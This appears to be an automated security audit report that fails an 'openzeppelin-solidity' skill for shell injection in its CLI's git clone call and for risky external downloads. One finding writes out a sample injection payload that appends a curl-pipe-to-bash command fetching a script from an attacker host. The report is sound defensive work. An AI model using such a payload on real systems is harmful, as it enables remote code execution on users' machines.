openzeppelin-solidity
Fail
Audited by Gen Agent Trust Hub on Mar 4, 2026
Risk Level: HIGHCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: The
bin/cli.jsscript is vulnerable to shell command injection in theaddFromRemotefunction. It useschild_process.execSyncto run agit clonecommand using a URL provided as a command-line argument. While some basic regex validation is applied to short-hand GitHub paths, any argument starting withhttps://orhttp://is passed directly to the shell unsanitized. An attacker could exploit this by providing a payload such ashttps://github.com/user/repo; curl http://attacker.com/script | bash. - [EXTERNAL_DOWNLOADS]: The skill's CLI tool facilitates the downloading of external content from arbitrary GitHub repositories into the user's local workspace. While intended to allow users to pull in updated or community rules, it creates a vector for downloading and executing untrusted configuration files if the source repository is malicious.
Recommendations
- AI detected serious security threats
Audit Metadata